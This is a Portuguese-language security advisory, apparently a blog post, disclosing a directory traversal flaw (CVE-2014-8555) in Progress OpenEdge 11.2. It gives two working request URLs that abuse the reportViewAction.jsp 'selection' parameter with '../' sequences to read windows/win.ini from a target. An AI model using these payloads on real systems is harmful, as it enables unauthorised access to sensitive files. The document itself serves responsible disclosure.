Ao analisarmos a aplicação OpenEdge, identificamos algumas vulnerabilidades, após algumas tentativas de contato com a empresa sem sucesso decidimos por esperar a empresa lançar novas versões da aplicação para podermos divulgar as falhas, pois algumas podem ser utilizadas para o acesso indevido a arquivos sensíveis de computadores que utilizam a aplicação.

Descrição da plataforma segundo o website do fabricante

O OpenEdge da Progress é a plataforma completa de desenvolvimento de aplicações, para construir aplicações de negócios dinâmicas e baseado em processos de negócios, para implementação segura em qualquer plataforma, qualquer dispositivo móvel e qualquer Cloud.

Interface web da aplicação

A falha de segurança

# Software: Progress OpenEdge
# Versão: 11.2
# Empresa: Progress Software
# Website: www.progress.com
# Vulnerabilidade: Directory Traversal
# CVE: CVE-2014-8555
# Autor: Mauricio Corrêa

O usuário malicioso envia uma requisição mal formada que gera o acesso de arquivos subindo diretórios da seguinte forma:

http://IP_do_Alvo:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

ou então

http://IP_do_Alvo:9090/report/reportViewAction.jsp?selection=../../../../../../../../../../windows/win.ini

 Onde a aplicação retorna informações do arquivo, conforme demonstramos na imagem a seguir: